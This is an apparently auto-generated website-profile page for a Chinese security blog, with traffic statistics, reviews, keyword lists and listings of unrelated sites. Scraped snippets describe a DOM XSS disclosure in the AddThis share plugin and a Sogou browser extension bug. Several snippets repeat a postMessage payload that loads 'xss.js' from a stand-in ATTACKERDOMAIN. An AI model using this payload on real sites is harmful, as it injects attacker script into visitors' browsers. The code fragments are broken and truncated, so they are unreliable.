zhchbin.github.io zhchbin.github.io

zhchbin.github.io

zhchbin

说明 这个漏洞是 https:/ labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/. AddThis是由多姆 沃纳伯格 Dom Vonarburg 创立并由Clearspring公司拥有的一个社会性书签服务。 From https:/ zh.wikipedia.org/wiki/AddThis. Go to www.addthis.com/dashboard to customize your tools -. S7addthis.com/js/300/addthis widget.js#pubid=ra-538ceb912f1cca19". At-share-bookmarklet:/ example.com/xss.js. ContentWindow.postMessage( 'at-share-bookmarklet:/ ATTACKERDOMAIN/xss.js'. Parent = = window. C & u( window. T = atr.substring( 0. O & n) {. Loader ro...

http://zhchbin.github.io/

WEBSITE DETAILS
SEO
PAGES
SIMILAR SITES

TRAFFIC RANK FOR ZHCHBIN.GITHUB.IO

TODAY'S RATING

>1,000,000

TRAFFIC RANK - AVERAGE PER MONTH

BEST MONTH

October

AVERAGE PER DAY Of THE WEEK

HIGHEST TRAFFIC ON

Saturday

TRAFFIC BY CITY

CUSTOMER REVIEWS

Average Rating: 3.7 out of 5 with 6 reviews
5 star
1
4 star
4
3 star
0
2 star
0
1 star
1

Hey there! Start your review of zhchbin.github.io

AVERAGE USER RATING

Write a Review

WEBSITE PREVIEW

Desktop Preview Tablet Preview Mobile Preview

LOAD TIME

0.3 seconds

CONTACTS AT ZHCHBIN.GITHUB.IO

Login

TO VIEW CONTACTS

Remove Contacts

FOR PRIVACY ISSUES

CONTENT

SCORE

6.2

PAGE TITLE
zhchbin | zhchbin.github.io Reviews
<META>
DESCRIPTION
说明 这个漏洞是 https:/ labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/. AddThis是由多姆 沃纳伯格 Dom Vonarburg 创立并由Clearspring公司拥有的一个社会性书签服务。 From https:/ zh.wikipedia.org/wiki/AddThis. Go to www.addthis.com/dashboard to customize your tools -. S7addthis.com/js/300/addthis widget.js#pubid=ra-538ceb912f1cca19. At-share-bookmarklet:/ example.com/xss.js. ContentWindow.postMessage( 'at-share-bookmarklet:/ ATTACKERDOMAIN/xss.js'. Parent = = window. C & u( window. T = atr.substring( 0. O & n) {. Loader ro...
<META>
KEYWORDS
1 Hexo
2 NexT
3
4 coupons
5 reviews
6 scam
7 fraud
8 hoax
9 genuine
10 deals
CONTENT
Page content here
KEYWORDS ON
PAGE
zhchbin,分享插件addthis导致的dom xss,修复的绕过,目前已经报告给addthis并得到修复,使用的例子有,使用这款插件,需要在网页上加入类似以下的代码,script,async,当插件加载完成后,就会监听,message,看完前面提到的那篇文章之后,我们可以知道在这个事件处理函数中,如果,事件处理函数接收到一个,合法来源,的消息,消息内容如下,时,就会动态在页面中插入指定的js脚本,iframe,frame,https / targetpage/using addthis,检查来源
SERVER
GitHub.com
CONTENT-TYPE
utf-8
GOOGLE PREVIEW

zhchbin | zhchbin.github.io Reviews

https://zhchbin.github.io

说明 这个漏洞是 https:/ labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/. AddThis是由多姆 沃纳伯格 Dom Vonarburg 创立并由Clearspring公司拥有的一个社会性书签服务。 From https:/ zh.wikipedia.org/wiki/AddThis. Go to www.addthis.com/dashboard to customize your tools -. S7addthis.com/js/300/addthis widget.js#pubid=ra-538ceb912f1cca19". At-share-bookmarklet:/ example.com/xss.js. ContentWindow.postMessage( 'at-share-bookmarklet:/ ATTACKERDOMAIN/xss.js'. Parent = = window. C & u( window. T = atr.substring( 0. O & n) {. Loader ro...

INTERNAL PAGES

zhchbin.github.io zhchbin.github.io
1

标签 | zhchbin

http://zhchbin.github.io/tags

主题 - NexT.Muse.

2

zhchbin(Chaobin Zhang) | zhchbin

http://zhchbin.github.io/about

Contributor of Google Chromium. Google Summer of Code student, 2013 and 2014. Intern at Intel Open Source Technology Center from 2012-07 to 2012-11. 清华挖石油的博士 http:/ conghui.github.io/. 网红羡辙 http:/ zhangwenli.com/. 小土刀 http:/ wdxtub.com/. 主题 - NexT.Muse.

3

zhchbin

http://zhchbin.github.io/page/9

First attempt to fix a bug of chromium. Share my first failed experience about code contribution to chromium. 这两个月来接触到一个开源项目 node-webkit 项目地址 Link. 至于什么是chrome content api呢 该模块的主要功能是采用多进程 包含Browser进程,Render进程以及GPU进程 的模型渲染一个页面。 主要想体现的是 1 使用node.js模块 2 nw提供的增加本地化应用特性的API 3 打包并发布你的应用程序。 示例程序的package.json文件内容如下 关于各个参数所代表的含义可以在wiki上查找 Link. Indexhtml文件的内容如下,该段代码主要是使用node.js的fs模块读取 E:/ 目录下的文件夹,在每个文件夹的点击事件中,我们调用node-webkit中提供的shell接口在窗口管理器中打开该文件夹。 Hello World / title. Filesystem of your E: / h1.

4

分享插件AddThis导致的DOM XSS | zhchbin

http://zhchbin.github.io/2016/12/25/DOM-XSS-Caused-by-AddThis

说明 这个漏洞是 https:/ labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/. AddThis是由多姆 沃纳伯格 Dom Vonarburg 创立并由Clearspring公司拥有的一个社会性书签服务。 From https:/ zh.wikipedia.org/wiki/AddThis. Go to www.addthis.com/dashboard to customize your tools -. S7addthis.com/js/300/addthis widget.js#pubid=ra-538ceb912f1cca19". At-share-bookmarklet:/ example.com/xss.js. ContentWindow.postMessage( 'at-share-bookmarklet:/ ATTACKERDOMAIN/xss.js'. Parent = = window. C & u( window. T = atr.substring( 0. O & n) {.

5

zhchbin

http://zhchbin.github.io/page/2

案例链接 http:/ www.wooyun.org/bugs/wooyun-2016-0213422. 具体见 https:/ bugs.chromium.org/p/chromium/issues/detail? 浏览器版本号 6.3.8.21279. 从漏洞 http:/ wooyun.org/bugs/wooyun-2010-0145023. SogouExplorer.downloads.downloadSilently({. Url:"http:/ tmxk.org/img/r-c.png",. Denying load of se-extension:/ ext238561744/background.html. Resources must be listed in the web accessible resources manifest key in order to be loaded by pages outside the extension. X1 = x.contentWindow[ 0. X1contentDocument) { ml(); }. X1contentDoc...

UPGRADE TO PREMIUM TO VIEW 2 MORE

TOTAL PAGES IN THIS WEBSITE

7

LINKS TO THIS WEBSITE

wdxtub.com wdxtub.com

标签: CMU | 小土刀

http://wdxtub.com/tags/CMU

Agony is my triumph. 云计算 反思课 5 实时服务测试的策略与思考. 云计算 反思课 4 HBase 优化的策略与思考. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

标签: 健康 | 小土刀

http://wdxtub.com/tags/健康

Agony is my triumph. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

标签: 人造 | 小土刀

http://wdxtub.com/tags/人造

Agony is my triumph. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

标签: 写作 | 小土刀

http://wdxtub.com/tags/写作

Agony is my triumph. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

标签: 做饭 | 小土刀

http://wdxtub.com/tags/做饭

Agony is my triumph. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

分类: Thinking | 小土刀

http://wdxtub.com/categories/Thinking

Agony is my triumph. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

标签: Imaging Cup | 小土刀

http://wdxtub.com/tags/Imaging-Cup

Agony is my triumph. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

归档 | 小土刀

http://wdxtub.com/archives

Agony is my triumph. Go 之旅 V 项目实战 一起看飞机 - 客户端. Go 之旅 IV 项目实战 一起看飞机 - 后台. Go 之旅 III 项目实战 一起看飞机 - 项目介绍. Logstash 连接 Kafka 指南. Rsyslog 连接 Kafka 指南. Go 之旅 II 我的笨办法学 Go. Go 之旅 I Go 快速入门. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

标签: 体力 | 小土刀

http://wdxtub.com/tags/体力

Agony is my triumph. 主题 - NexT.Mist.

wdxtub.com wdxtub.com

标签: CodePlane | 小土刀

http://wdxtub.com/tags/CodePlane

Agony is my triumph. 主题 - NexT.Mist.

UPGRADE TO PREMIUM TO VIEW 10 MORE

TOTAL LINKS TO THIS WEBSITE

20

OTHER SITES

zhcharlie.com zhcharlie.com

珠海查理科技节能环保有限公司

电话: 0756-2251783 传真: 0756-3818117 E-mail: zhcharlie@126.com.

zhchauderlot.com zhchauderlot.com

SUPER TOP OSITION

Fais moi ça à 1 , Johnny.

zhchaxball.blogspot.com zhchaxball.blogspot.com

Zona Hax Clube

Domingo, 1 de abril de 2012. A equipa (ZHC) agora encontra-se no TS. Convívio ou discutir algum assunto. Com a equipa pode nos encontrar. Haxballpt ou no TS no respétivo server. O nosso channel (ZHC). Http:/ www.haxballportugal.com/. É tudo por agora. Postado por João Pires. Segunda-feira, 26 de março de 2012. Ver no Plantel em cima. Diretor Desportivo/Estrela da Equipa:. Como encontrar a equipa:. Server TS: mafiadohaxball.teamspeak3.com:8166. Http:/ www.haxballportugal.com/. Postado por João Pires.

zhchb.com zhchb.com

阿博小站

原文链接 http:/ blog.devep.net/virushuo/2011/03/26/post 78.html. Http:/ blog.devep.net/virushuo/2011/03/26/post 78.html. Ldquo;扫描是扫描了”你终于承认了——阿博解读马化腾专访言论. Http:/ www.zhchb.com/blogimages/upload/2010/201011knb/20101104.html. 本篇文章版权归可能吧所有,原文地址 http:/ www.kenengba.com/post/2987.html. QQ扫描硬盘这事儿,早在几个月前就有相关的议论,但终因关注的人较少而没掀起大浪,但这事确确实实很早就有了,几个月前我用微软的Process Monitor 进程监视器 工具也同样发现其在扫描与聊天完全没有关系的内容, QQ扫描硬盘 被确定为属实,但实在是因为没有什么东西可以替代QQ而不得不继续使用。 题外话 我收到过一些对 看图说话 系列的反馈,有的人只对那些照片感兴趣,而对其背后的东西则无兴趣。 在网上搜索之,看来不只我一个人遇到了这个问题,遗憾的是,没有...

zhchbin.github.io zhchbin.github.io

zhchbin

说明 这个漏洞是 https:/ labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/. AddThis是由多姆 沃纳伯格 Dom Vonarburg 创立并由Clearspring公司拥有的一个社会性书签服务。 From https:/ zh.wikipedia.org/wiki/AddThis. Go to www.addthis.com/dashboard to customize your tools -. S7addthis.com/js/300/addthis widget.js#pubid=ra-538ceb912f1cca19". At-share-bookmarklet:/ example.com/xss.js. ContentWindow.postMessage( 'at-share-bookmarklet:/ ATTACKERDOMAIN/xss.js'. Parent = = window. C & u( window. T = atr.substring( 0. O & n) {. Loader ro...

zhchch.com zhchch.com

----Ö麣¾­¼ÃÌØÇø³Ï³ÉÓ¡ÎñÓÐÏÞ¹«Ë¾----

zhchcity.com zhchcity.com

众筹城-创业者的一生之城|股权众筹、回报众筹

zhchdt.com zhchdt.com

诸城市鼎泰包装彩印有限公司是以塑料包装印刷为主,集电脑设计制作,菲林输出和凹版作为一体的综合性企业.

公司根据市场需求,按照以 效率为中心,质量为主题,管理为主线,技术创新为动力,靠质量求生存 的思路,逐步建立起了一套完善的质量管理体系,并通过了国家食品安全包装 QS 认证。 Br 公司于2008年通过了国家的食品安全包装 QS 认证 证号 QS37-10101-02406 ,注册拥有了 鼎泰包装 商标,经过十几年的长足发展,客户已遍布全国及周边一些国外城市。 Br 我们将以一流的产品 完善快捷的售后服务 诚信不欺的商业信誉 以客户要求为先导,以卓越品质为目标,已持续发展为动力,不断创造包装行业的新奇迹,鼎泰愿与您同发展,共赢利,创辉煌. 电话 0536-6189286 手机 15725647865. Http:/ www.zhchdt.com www.zcdtbz.com. Http:/ www.zcdtbz.cn.alibaba.com. Http:/ www.zcdtbz.21food.cn. 版权持有 诸城市鼎泰包装彩印有限公司 技术支持 潍坊 百度. 电话 0536-6189286 传真 0536-6066397 公司地址 诸城市东外环与北外环交界处北300米路西.

zhche.com zhche.com

zhche.com

zhchedu.com zhchedu.com

众成教育

众成邮箱 zcjy dl@126.com 投诉邮箱 sahuang@126.com 辽ICP备09019381号.